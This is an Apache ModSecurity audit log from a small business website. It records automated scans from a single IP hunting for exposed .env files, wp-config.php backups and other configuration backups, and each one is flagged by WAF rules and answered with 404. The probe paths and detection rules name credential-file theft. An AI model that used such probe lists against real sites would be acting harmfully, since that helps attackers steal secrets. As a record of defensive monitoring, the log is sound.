"328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --b8d9426f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/.env.save"] [unique_id "aFBqu5lL5_2Zd8wUdfLI4gAAAAg"] Stopwatch: 1750100667568998 3214 (- - -) Stopwatch2: 1750100667568998 3214; combined=1898, p1=418, p2=1420, p3=0, p4=0, p5=60, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b8d9426f-Z-- --dc03b000-A-- [17/Jun/2025:00:34:27.791593 +0530] aFBqu43q6eGJ2xNcTd6GrAAAAAU 185.177.72.201 36462 127.0.0.1 7080 --dc03b000-B-- GET /database.php.bak HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --dc03b000-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --dc03b000-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/database.php.bak"] [unique_id "aFBqu43q6eGJ2xNcTd6GrAAAAAU"] Stopwatch: 1750100667789013 2634 (- - -) Stopwatch2: 1750100667789013 2634; combined=1636, p1=289, p2=1295, p3=0, p4=0, p5=52, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --dc03b000-Z-- --c8c58166-A-- [17/Jun/2025:00:34:28.343159 +0530] aFBqvJVkCcfT-Z8NQYyUswAAAAc 185.177.72.201 36530 127.0.0.1 7080 --c8c58166-B-- GET /index.html.backup HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c8c58166-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --c8c58166-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".html.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".html.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/index.html.backup"] [unique_id "aFBqvJVkCcfT-Z8NQYyUswAAAAc"] Stopwatch: 1750100668340254 2956 (- - -) Stopwatch2: 1750100668340254 2956; combined=1704, p1=375, p2=1275, p3=0, p4=0, p5=54, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c8c58166-Z-- --881b821d-A-- [17/Jun/2025:00:34:28.675321 +0530] aFBqvE3CmevS3xeTzmojAgAAAAQ 185.177.72.201 36550 127.0.0.1 7080 --881b821d-B-- GET /mongodb/config/dev/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --881b821d-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --881b821d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/mongodb/config/dev/.env"] [unique_id "aFBqvE3CmevS3xeTzmojAgAAAAQ"] Stopwatch: 1750100668671704 3685 (- - -) Stopwatch2: 1750100668671704 3685; combined=2061, p1=549, p2=1461, p3=0, p4=0, p5=51, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --881b821d-Z-- --c6f37c19-A-- [17/Jun/2025:00:34:28.894982 +0530] aFBqvBwcFb_n1P0IC9xlKQAAAAo 185.177.72.201 36584 127.0.0.1 7080 --c6f37c19-B-- GET /production/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c6f37c19-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --c6f37c19-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/production/.env"] [unique_id "aFBqvBwcFb_n1P0IC9xlKQAAAAo"] Stopwatch: 1750100668892915 2130 (- - -) Stopwatch2: 1750100668892915 2130; combined=1225, p1=295, p2=881, p3=0, p4=0, p5=49, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c6f37c19-Z-- --d0d3730e-A-- [17/Jun/2025:00:34:29.336782 +0530] aFBqvSid3pHxA3RhGpzqEAAAAAk 185.177.72.201 54266 127.0.0.1 7080 --d0d3730e-B-- GET /config.inc.old HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d0d3730e-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --d0d3730e-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".inc.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".inc.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/config.inc.old"] [unique_id "aFBqvSid3pHxA3RhGpzqEAAAAAk"] Stopwatch: 1750100669333715 3144 (- - -) Stopwatch2: 1750100669333715 3144; combined=1788, p1=373, p2=1338, p3=0, p4=0, p5=77, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d0d3730e-Z-- --cb55e962-A-- [17/Jun/2025:00:34:29.557358 +0530] aFBqvRwcFb_n1P0IC9xlKwAAAAo 185.177.72.201 54296 127.0.0.1 7080 --cb55e962-B-- GET /composer.json.save HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --cb55e962-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --cb55e962-H-- Message: Warning. Matched phrase "/composer.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/composer.json.save"] [unique_id "aFBqvRwcFb_n1P0IC9xlKwAAAAo"] Stopwatch: 1750100669554265 3147 (- - -) Stopwatch2: 1750100669554265 3147; combined=1826, p1=360, p2=1407, p3=0, p4=0, p5=59, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cb55e962-Z-- --6b58d900-A-- [17/Jun/2025:00:34:30.219663 +0530] aFBqvplL5_2Zd8wUdfLI6QAAAAg 185.177.72.201 54348 127.0.0.1 7080 --6b58d900-B-- GET /.env.example HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6b58d900-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --6b58d900-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/.env.example"] [unique_id "aFBqvplL5_2Zd8wUdfLI6QAAAAg"] Stopwatch: 1750100670216909 2809 (- - -) Stopwatch2: 1750100670216909 2809; combined=1669, p1=369, p2=1245, p3=0, p4=0, p5=55, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6b58d900-Z-- --938dfc2c-A-- [17/Jun/2025:00:34:30.660547 +0530] aFBqvn8PxMRZ7s11niQJwQAAAAI 185.177.72.201 54420 127.0.0.1 7080 --938dfc2c-B-- GET /package.json.backup HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --938dfc2c-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --938dfc2c-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".json.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".json.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/package.json.backup"] [unique_id "aFBqvn8PxMRZ7s11niQJwQAAAAI"] Stopwatch: 1750100670657406 3195 (- - -) Stopwatch2: 1750100670657406 3195; combined=1864, p1=324, p2=1479, p3=0, p4=0, p5=61, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --938dfc2c-Z-- --87d1ec67-A-- [17/Jun/2025:00:34:30.772722 +0530] aFBqvn3hoSwVUy254pH0HgAAACQ 185.177.72.201 54434 127.0.0.1 7080 --87d1ec67-B-- GET /wp-config.inc HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --87d1ec67-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --87d1ec67-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.inc"] [unique_id "aFBqvn3hoSwVUy254pH0HgAAACQ"] Stopwatch: 1750100670767947 4868 (- - -) Stopwatch2: 1750100670767947 4868; combined=3017, p1=484, p2=2436, p3=0, p4=0, p5=96, sr=181, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --87d1ec67-Z-- --aeacb363-A-- [17/Jun/2025:00:34:31.326934 +0530] aFBqv5lL5_2Zd8wUdfLI7AAAAAg 185.177.72.201 54530 127.0.0.1 7080 --aeacb363-B-- GET /storage/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --aeacb363-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --aeacb363-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/storage/.env"] [unique_id "aFBqv5lL5_2Zd8wUdfLI7AAAAAg"] Stopwatch: 1750100671323101 3904 (- - -) Stopwatch2: 1750100671323101 3904; combined=2204, p1=634, p2=1502, p3=0, p4=0, p5=68, sr=130, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --aeacb363-Z-- --f3ba7404-A-- [17/Jun/2025:00:34:31.659380 +0530] aFBqv03CmevS3xeTzmojCgAAAAQ 185.177.72.201 54550 127.0.0.1 7080 --f3ba7404-B-- GET /config.inc.php.old HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --f3ba7404-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --f3ba7404-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".inc.php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".inc.php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/config.inc.php.old"] [unique_id "aFBqv03CmevS3xeTzmojCgAAAAQ"] Stopwatch: 1750100671656076 3361 (- - -) Stopwatch2: 1750100671656076 3361; combined=2034, p1=381, p2=1594, p3=0, p4=0, p5=59, sr=125, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f3ba7404-Z-- --a9424c0a-A-- [17/Jun/2025:00:34:32.100569 +0530] aFBqwFJfblPUQiSn5r1hfgAAAAA 185.177.72.201 54588 127.0.0.1 7080 --a9424c0a-B-- GET /dev/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a9424c0a-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --a9424c0a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/dev/.env"] [unique_id "aFBqwFJfblPUQiSn5r1hfgAAAAA"] Stopwatch: 1750100672097594 3028 (- - -) Stopwatch2: 1750100672097594 3028; combined=1653, p1=387, p2=1210, p3=0, p4=0, p5=56, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a9424c0a-Z-- --ba14f60f-A-- [17/Jun/2025:00:34:32.321396 +0530] aFBqwI3q6eGJ2xNcTd6GuAAAAAU 185.177.72.201 54602 127.0.0.1 7080 --ba14f60f-B-- GET /wp-config.php.bak HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --ba14f60f-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --ba14f60f-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php.bak"] [unique_id "aFBqwI3q6eGJ2xNcTd6GuAAAAAU"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php.bak"] [unique_id "aFBqwI3q6eGJ2xNcTd6GuAAAAAU"] Stopwatch: 1750100672318279 3172 (- - -) Stopwatch2: 1750100672318279 3172; combined=1845, p1=388, p2=1377, p3=0, p4=0, p5=79, sr=103, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ba14f60f-Z-- --8955bb0c-A-- [17/Jun/2025:00:34:32.542269 +0530] aFBqwH3hoSwVUy254pH0IwAAACQ 185.177.72.201 54642 127.0.0.1 7080 --8955bb0c-B-- GET /wp-config.php.bak1 HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --8955bb0c-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --8955bb0c-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php.bak1"] [unique_id "aFBqwH3hoSwVUy254pH0IwAAACQ"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/surbhiprintographics.com/httpdocs/wp-config.php.bak1' not found or unable to stat Stopwatch: 1750100672539254 3071 (- - -) Stopwatch2: 1750100672539254 3071; combined=1863, p1=355, p2=1447, p3=0, p4=0, p5=60, sr=106, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8955bb0c-Z-- --c3e48d60-A-- [17/Jun/2025:00:34:32.653324 +0530] aFBqwCid3pHxA3RhGpzqGQAAAAk 185.177.72.201 54646 127.0.0.1 7080 --c3e48d60-B-- GET /wp-config.php.new HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c3e48d60-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --c3e48d60-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] 